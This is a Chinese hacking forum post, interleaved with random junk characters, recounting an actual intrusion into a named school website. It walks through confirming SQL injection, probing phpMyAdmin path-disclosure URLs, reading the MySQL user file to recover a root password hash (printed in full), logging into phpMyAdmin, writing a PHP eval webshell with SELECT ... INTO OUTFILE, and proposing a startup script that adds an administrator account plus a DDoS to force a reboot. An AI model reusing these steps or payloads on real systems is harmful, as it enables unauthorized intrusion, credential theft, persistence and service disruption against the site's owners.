第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
) G8 M6 V& C3 p4 |/ v% x发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
2 d! }& z' O5 d" j) n
3 g1 j5 g$ A; H
6 I8 l2 e* g- @: d' [5 w" Q+ J
& N" ] w$ M* ~. P0 G( Q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
3 k/ p" |3 n* D3 X0 z- y% ]( s4 g+ R* R
那么想可以直接写入shell ,getshell有几个条件:7 ]' T4 d4 |* U
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
- ~5 {5 Y' B0 ^% y
) U# F+ l) o C试着爆绝对路径: 4 ^2 z# S9 R: e" \. R
1./phpMyAdmin/index.php?lang[]=1
$ z* k& Q& [8 L2./phpMyAdmin/phpinfo.php 3 Q+ d# z# T* `5 T# U& S$ o* _* W
3./load_file()
5 c8 K. e% r5 T! G# h4./phpmyadmin/themes/darkblue_orange/layout.inc.php 6 [1 r( B! T8 t, z1 v8 j' I
5./phpmyadmin/libraries/select_lang.lib.php
6 J$ i, r. I$ k& z" u/ K. c! g6./phpmyadmin/libraries/lect_lang.lib.php * m4 `; z/ ]/ J6 a
7./phpmyadmin/libraries/mcrypt.lib.php
8 r6 Y1 u" y: K, {+ `3 e5 ~2 [) w8./phpmyadmin/libraries/export/xls.php % z/ k9 E& {2 s) D1 c# X% t
# Z* T' }9 O g; i" u( j均不行...........................
7 z; V1 j4 B' C& O/ s
& P( v9 \8 d' `, }1 d0 m御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 9 n/ ?# c) x- r/ |- J' D' R9 Q( ]
( ^+ }' m( q6 K0 F2 h: F
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
7 A& M' `- T5 X9 |3 g
3 [* L; ~" B5 k4 ]4 L, q/ z/ u1 @默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
+ ]7 M Y" a* ~' }" U% ]' c% I( t8 |, s0 \
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 3 c5 c- ?( X, x9 j* I
& H0 |6 j* v' ~& M P+ @想想root还可以读,读到root密码进phpmyadmin 也可以拿shell & G( {$ W7 a8 M% I& @
2 g. G2 _$ A" Y" ^+ e3 O, [
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 9 a' G, ]# O& p+ u( I
$ T$ I6 [/ g+ P+ C自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD # I5 T3 H0 N7 K6 Y" n2 q( U2 I3 U- ?
3 e, Y0 D2 k9 o( r4 J7 |6 l: |成功读到root密码:
; T8 l1 r. a4 f0 k
" K8 p# ]6 K+ M2 t, z17---- r(0072) 9 s0 }5 K* ^$ }
18---- o(006f) 3 ^$ Y6 N8 s* y5 B8 W2 h
19---- o(006f)
9 G+ C( e$ ]8 N20---- t(0074) 3 o% K# a* K% y V" E
21---- *(002a)
7 c$ L- W8 R1 M7 ^- R+ g! C22---- 8(0038)
) `; {8 Z& s9 t3 j4 E23---- 2(0032)
. M% N: o m( W* ?$ E$ c, t24---- E(0045) + P8 p i5 Z; G5 E9 e9 o; t5 |4 ^
25---- 1(0031)
5 A2 `1 Z& m9 V26---- C(0043)
4 g' f! G; W( I) Z( i) j: Y, f27---- 5(0035) ; m. p) T% n' D- l4 k, N( S K
28---- 8(0038) ( r, m! s, w( A' x P! n
29---- 2(0032)
! h2 n6 s. k5 L% |4 X: c. E/ N* z30---- 8(0038) " w; \- ?% D" f, N3 k
31---- A(0041)
' t4 j" P x u% ` ^/ f3 r32---- 9(0039)
8 [9 C2 \0 P9 O, f" z9 e- O9 ^33---- B(0042) ; o' ]2 }# H$ C9 e: s+ `
34---- 5(0035)
0 b, x7 { k1 d35---- 4(0034) 8 l7 w( X$ ^8 b- T5 i; l$ X
36---- 8(0038) $ c- L( K9 K' D2 i
37---- 6(0036) 2 r5 k1 k! H9 v" e: _( L3 \% f7 N
38---- 4(0034)
& y" U/ @% P) f4 N6 Z8 D39---- 9(0039)
. l g2 K. n: W3 h+ z) L9 x# b40---- 1(0031)
6 H# B7 D; ]2 R' a/ M41---- 1(0031)
# h/ H) G6 S/ G% n42---- 5(0035)
, c1 t6 x3 \. U# R43---- 3(0033) : N& Y5 U& A7 `( B
44---- 5(0035)
5 Q, Z' R5 z! L& i9 t- Y( H& n3 ~ s4 h3 C45---- 9(0039) j) r9 Z6 n1 O& N2 ? w6 \
46---- 8(0038) ) U6 r8 w I) C
47---- F(0046)
8 T+ K) V0 Y$ _4 n1 V48---- F(0046)
0 n8 X, b# g3 h/ b% u6 I6 f; g2 U49---- 4(0034)
+ T V9 L% S+ q2 b5 Y50---- F(0046)
8 d" H5 e$ p* B9 A! x) ~; k( Y51---- 0(0030) ; f. \/ v8 b) c& N; j) T
52---- 3(0033)
3 t* L. @5 v# Z! O6 p- r8 I53---- 2(0032)
/ F3 _5 C% |9 {' ^9 A54---- A(0041)
! K( X( P0 l& X( ~55---- 4(0034) 0 [. g3 S. n( x, s3 O
56---- A(0041) ! s- n5 V B+ S. k* P9 ^5 o; y
57---- B(0042) / `2 j1 Q* K0 E Y" f
58---- *(0044)
; ?0 b/ f0 {% W8 r( s( R: p/ ?59---- *(0035)
. m9 u# U$ G6 t& R8 d/ @2 v60---- *(0041)
0 f+ a; |' r$ S5 J61---- *0032) . z/ `# M, ?8 @7 i8 J- ~
( E; z+ I* e, D: Z! l |解密后成功登陆phpmyamin 6 N; O, [" |3 Y% {) A8 d/ I8 M
" @6 @. K$ ?. U4 F+ m. E$ k! [
3 X+ P% Q" V: s5 ~ : O$ Z: v/ I9 A V% e' ?9 K3 L
9 A1 y9 }+ H% L找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 1 M7 v0 ]0 r( a! P/ P
: o m& g( G, ?6 {. d成功执行,拿下shell,菜刀连接:
O% W( r2 c9 D7 ~" m
: y: N5 P) {8 d7 `* w# L服务器不支持asp,aspx,php提权无果................... # N/ i3 ~$ g6 ?( D* J- f) S
, d% p3 e) R- n! E但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ) T- u$ |2 p" R0 x
服务器上已经有个隐藏帐号了
2 ?( T- e# y# w0 r# {7 t- t别名 administrators
- W8 S3 }9 I; ~2 c, {9 I4 F注释 管理员对计算机/域有不受限制的完全访问权 " |+ X& {/ S# ^/ @, Q
成员 & m2 B( R( R9 ]$ J
-------------------------------------------------------------------------------
, D, Z3 }% S2 U) _. u( C/ v/ Radmin6 S; r4 f3 {) j( z$ X$ e- A. B
Administrator+ T4 s. V: w& v6 |+ a
slipper$
_! T! [4 s T: T$ ^sqluser
0 U) @0 @" M" z3 y( c: ]6 Z( i" u命令成功完成。 2 y' D1 p* ?# i* Z
3 a0 @; r* a0 B7 E服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。3 |5 I: m0 h4 Q
1 }* R8 J: p* o1 T
ddos服务器重启,不然就只能坐等服务器重启了...............................
, ]1 ?6 b1 @, I7 A1 s7 z
3 @7 \- p. R* R' h. H0 A$ Q: Q 4 j7 b1 s, H5 ?0 R
|